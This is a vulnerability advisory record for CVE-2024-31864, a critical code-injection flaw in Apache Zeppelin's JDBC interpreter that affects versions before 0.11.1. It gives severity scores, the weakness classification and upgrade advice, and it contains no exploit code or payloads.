CVE-2024-31864 – org.apache.zeppelin:zeppelin-jdbc

Package

Manager: maven
Name: org.apache.zeppelin:zeppelin-jdbc
Vulnerable Version: >=0 <0.11.1

Severity

Level: Critical

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.0116 pctl0.77784

Details

Apache Zeppelin remote code execution by adding malicious JDBC connection string Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Zeppelin. The attacker can inject sensitive configuration or malicious code when connecting MySQL database via JDBC driver. This issue affects Apache Zeppelin: before 0.11.1. Users are recommended to upgrade to version 0.11.1, which fixes the issue.

Metadata

Created: 2024-04-09T18:30:22Z
Modified: 2024-05-02T18:59:28Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-66j8-c83m-gj5f/GHSA-66j8-c83m-gj5f.json
CWE IDs: ["CWE-94"]
Alternative ID: GHSA-66j8-c83m-gj5f
Finding: F422
Auto approve: 1